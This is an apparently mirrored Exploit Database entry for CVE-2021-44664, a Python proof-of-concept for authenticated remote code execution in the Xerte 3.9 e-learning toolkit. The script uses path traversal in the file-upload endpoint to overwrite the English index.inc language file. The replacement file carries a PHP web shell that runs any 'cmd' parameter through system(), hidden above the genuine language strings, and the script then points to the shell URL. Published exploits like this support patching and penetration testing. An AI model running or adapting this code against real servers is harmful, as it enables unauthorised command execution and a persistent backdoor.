Xerte 3.9 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 135 阅读

• 作者： Rik Lutz
  日期： 2022-03-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50795/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186

  # Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664   # This PoC assumes guest login is enabled and the en-GB langues files are used. # This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. # Vulnerable url: https://<host>/website_code/php/import/fileupload.php # The mediapath variable can be used to set the destination of the uploaded. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota   import requests import re   xerte_base_url = "http://127.0.0.1" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.   with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id)   # Use a default template data = { &apos;tutorialid&apos;: &apos;Nottingham&apos;, &apos;templatename&apos;: &apos;Nottingham&apos;, &apos;tutorialname&apos;: &apos;exploit&apos;, &apos;folder_id&apos;: &apos;&apos; }   # Create a new project in order to find the install path template_id = session.post(xerte_base_url + &apos;/website_code/php/templates/new_template.php&apos;, data=data)   # Find template ID data = { &apos;template_id&apos;: re.findall(&apos;(\d+)&apos;, template_id.text)[0] }   # Find the install path: install_path = session.post(xerte_base_url + &apos;/website_code/php/properties/media_and_quota_template.php&apos;, data=data) install_path = re.findall(&apos;mediapath" value="(.+?)"&apos;, install_path.text)[0]   headers = { &apos;User-Agent&apos;: &apos;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0&apos;, &apos;Accept&apos;: &apos;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8&apos;, &apos;Accept-Language&apos;: &apos;nl,en-US;q=0.7,en;q=0.3&apos;, &apos;Content-Type&apos;: &apos;multipart/form-data; boundary=---------------------------170331411929658976061651588978&apos;, }   # index.inc file data = \ &apos;&apos;&apos;-----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" Content-Type: application/octet-stream   <?php if(isset($_REQUEST[\&apos;cmd\&apos;])){ echo "<pre>"; $cmd = ($_REQUEST[\&apos;cmd\&apos;]); system($cmd); echo "</pre>"; die; } /** * * index.php english language file * * @author Patrick Lockley * @version 1.0 * @copyright Pat Lockley * @package */   define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");   define("INDEX_USERNAME_EMPTY", "Please enter your username");   define("INDEX_PASSWORD_EMPTY", "Please enter your password");   define("INDEX_LDAP_MISSING", "PHP\&apos;s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");   define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");   define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");   define("INDEX_LOGIN", "login area");   define("INDEX_USERNAME", "Username");   define("INDEX_PASSWORD", "Password");   define("INDEX_HELP_TITLE", "Getting Started");   define("INDEX_HELP_INTRODUCTION", "We\&apos;ve produced a short introduction to the Toolkits website.");   define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");   define("INDEX_NO_LDAP","PHP\&apos;s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");   define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");   define("INDEX_WORKSPACE_TITLE","My Projects");   define("INDEX_CREATE","Project Templates");   define("INDEX_DETAILS","Project Details");   define("INDEX_SORT","Sort");   define("INDEX_SEARCH","Search");   define("INDEX_SORT_A","Alphabetical A-Z");   define("INDEX_SORT_Z","Alphabetical Z-A");   define("INDEX_SORT_NEW","Age (New to Old)");   define("INDEX_SORT_OLD","Age (Old to New)");   define("INDEX_LOG_OUT","Log out");   define("INDEX_LOGGED_IN_AS","Logged in as");   define("INDEX_BUTTON_LOGIN","Login");   define("INDEX_BUTTON_LOGOUT","Logout");   define("INDEX_BUTTON_PROPERTIES","Properties");   define("INDEX_BUTTON_EDIT","Edit");   define("INDEX_BUTTON_PREVIEW", "Preview");   define("INDEX_BUTTON_SORT", "Sort");   define("INDEX_BUTTON_NEWFOLDER", "New Folder");   define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");   define("INDEX_BUTTON_DELETE", "Delete");   define("INDEX_BUTTON_DUPLICATE", "Duplicate");   define("INDEX_BUTTON_PUBLISH", "Publish");   define("INDEX_BUTTON_CANCEL", "Cancel");   define("INDEX_BUTTON_SAVE", "Save");   define("INDEX_XAPI_DASHBOARD_FROM", "From:");   define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");   define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");   define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");   define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");   define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");   define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");   define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");   define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");   define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); \r \r -----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="mediapath"   &apos;&apos;&apos; \ + install_path \ + &apos;&apos;&apos;../../../languages/en-GB/ -----------------------------170331411929658976061651588978--\r &apos;&apos;&apos;   # Overwrite index.inc file response = session.post(xerte_base_url + &apos;/website_code/php/import/fileupload.php&apos;, headers=headers, data=data) print(&apos;Installation path: &apos; + install_path) print(response.text) if "success" in response.text: print("Visit shell @: " + xerte_base_url + &apos;/?cmd=whoami&apos;)